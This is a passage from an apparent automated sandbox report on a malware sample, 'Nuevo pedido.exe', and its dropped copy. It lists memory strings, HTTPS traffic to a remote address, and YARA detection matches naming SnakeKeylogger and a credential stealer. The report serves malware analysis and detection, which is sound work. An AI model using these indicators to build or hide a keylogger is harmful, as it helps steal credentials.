0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary

                  barindex
                  Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_026704730_2_02670473
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_026704780_2_02670478
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_026700400_2_02670040
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_0275D5BC0_2_0275D5BC
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F336980_2_06F33698
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F345480_2_06F34548
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F342100_2_06F34210
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F300400_2_06F30040
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F30F000_2_06F30F00
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F3368B0_2_06F3368B
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F354F80_2_06F354F8
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F345380_2_06F34538
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F355080_2_06F35508
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F332E00_2_06F332E0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F332D00_2_06F332D0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F342010_2_06F34201
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F3F3780_2_06F3F378
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F3F3670_2_06F3F367
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F330800_2_06F33080
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F330700_2_06F33070
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F300060_2_06F30006
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F31E100_2_06F31E10
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F30E100_2_06F30E10
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F31E000_2_06F31E00
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F32CD80_2_06F32CD8
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F32CC90_2_06F32CC9
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F3DCBF0_2_06F3DCBF
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F31C500_2_06F31C50
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F30D8A0_2_06F30D8A
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F36D880_2_06F36D88
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F36D780_2_06F36D78
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 0_2_06F3D8780_2_06F3D878
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7D28B9_2_02F7D28B
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F753839_2_02F75383
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7A0889_2_02F7A088
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7C1469_2_02F7C146
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F771189_2_02F77118
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7F6189_2_02F7F618
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7C7389_2_02F7C738
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7CA1B9_2_02F7CA1B
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F769A09_2_02F769A0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7E9889_2_02F7E988
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7CFBB9_2_02F7CFBB
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7CCEB9_2_02F7CCEB
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7C47B9_2_02F7C47B
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F73A249_2_02F73A24
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F729EC9_2_02F729EC
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F7E97A9_2_02F7E97A
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_02F73E099_2_02F73E09
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D848D09_2_06D848D0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8C9589_2_06D8C958
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8B7189_2_06D8B718
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8BE709_2_06D8BE70
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8A0709_2_06D8A070
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8A0609_2_06D8A060
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8EF489_2_06D8EF48
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8EF389_2_06D8EF38
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D848C19_2_06D848C1
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8F7F89_2_06D8F7F8
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8F7E89_2_06D8F7E8
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8B7089_2_06D8B708
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8F3919_2_06D8F391
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8F3A09_2_06D8F3A0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D8BE609_2_06D8BE60
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_06D83DCF9_2_06D83DCF
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_073700BD9_2_073700BD
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_07372F189_2_07372F18
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 9_2_073744689_2_07374468
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_02F0D5BC10_2_02F0D5BC
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_050E047810_2_050E0478
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_050E047310_2_050E0473
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_050E004010_2_050E0040
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_050E4BD010_2_050E4BD0
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767369810_2_07673698
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767453810_2_07674538
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767421010_2_07674210
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767004010_2_07670040
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_07670D8A10_2_07670D8A
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767574010_2_07675740
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767368A10_2_0767368A
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767550810_2_07675508
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_076754F810_2_076754F8
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767F37810_2_0767F378
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767420110_2_07674201
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_076732E010_2_076732E0
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_076732D010_2_076732D0
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767307010_2_07673070
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767000610_2_07670006
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_0767308010_2_07673080
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_07671E0010_2_07671E00
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_07670E1010_2_07670E10
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_07671E1010_2_07671E10
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_07676D7810_2_07676D78
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_07676D8810_2_07676D88
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_07672CC910_2_07672CC9
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BD51C810_2_08BD51C8
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BDE11010_2_08BDE110
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BD815610_2_08BD8156
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BDDC8710_2_08BDDC87
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BDEC0810_2_08BDEC08
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BD4FC810_2_08BD4FC8
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BDF8B810_2_08BDF8B8
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BDF39810_2_08BDF398
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BDEBF810_2_08BDEBF8
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BDF35810_2_08BDF358
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 10_2_08BD8C8810_2_08BD8C88
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305537014_2_03055370
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305D27814_2_0305D278
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305711814_2_03057118
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305C14614_2_0305C146
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305A08814_2_0305A088
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305C73814_2_0305C738
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305F61814_2_0305F618
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305C46814_2_0305C468
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305CA0814_2_0305CA08
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305E98814_2_0305E988
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_030569A014_2_030569A0
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305CFAB14_2_0305CFAB
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305CCD814_2_0305CCD8
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0305E97B14_2_0305E97B
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_030529E014_2_030529E0
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_03053E0914_2_03053E09
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_075500F914_2_075500F9
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0755427D14_2_0755427D
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_0755428014_2_07554280
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_07552D3014_2_07552D30
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 14_2_07552D2014_2_07552D20
                  Source: Nuevo pedido.exe, 00000000.00000002.1737310691.0000000007150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFGMaker.dll2 vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000000.00000002.1738497870.000000000AFA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000000.00000002.1730142640.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFGMaker.dll2 vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000000.00000002.1727384619.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000000.00000000.1669017064.000000000052A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehEab.exeD vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000000.00000002.1730142640.000000000294D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000009.00000002.4135978589.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Nuevo pedido.exe
                  Source: Nuevo pedido.exe, 00000009.00000002.4157019650.0000000009019000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Nuevo pedido.exe
                  Source: Nuevo pedido.exeBinary or memory string: OriginalFilenamehEab.exeD vs Nuevo pedido.exe
                  Source: Nuevo pedido.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
